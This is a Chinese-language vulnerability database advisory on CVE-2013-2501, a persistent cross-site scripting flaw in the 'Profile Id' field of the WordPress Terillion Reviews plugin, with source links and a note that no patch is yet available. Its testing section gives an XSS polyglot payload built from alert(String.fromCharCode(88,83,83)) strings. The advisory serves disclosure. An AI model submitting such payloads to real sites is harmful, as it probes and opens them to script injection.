WordPress Terillion Reviews 插件 Profile Id HTML注入漏洞

日期: 2013/03/27 | 标签:wordpress | 游览：393

受影响系统：
WordPress Terillion Reviews
描述：
BUGTRAQ ID: 58415
CVE(CAN) ID: CVE-2013-2501

WordPress Terillion Reviews可允许Terillion客户端在其网站上显示用户评论。

Terillion Reviews没有验证’Profile Id’字段，可允许攻击者通过特制的请求执行持续的XSS攻击。

<*来源：Aditya Balapure 链接：http://osvdb.org/91123 http://seclists.org/bugtraq/2013/Mar/54 *>

测试方法：
警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
>“>’>

建议：
厂商补丁：

WordPress
———
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://wordpress.org/extend/plugins/terillion-reviews/changelog/

← IBM Lotus Notes Autonomy KeyView文件解析程序缓冲区溢出漏洞(CVE-2012-6349)

WordPress FAQs Manager 插件跨站脚本和跨站请求伪造漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

WordPress Terillion Reviews 插件 Profile Id HTML注入漏洞

评论关闭。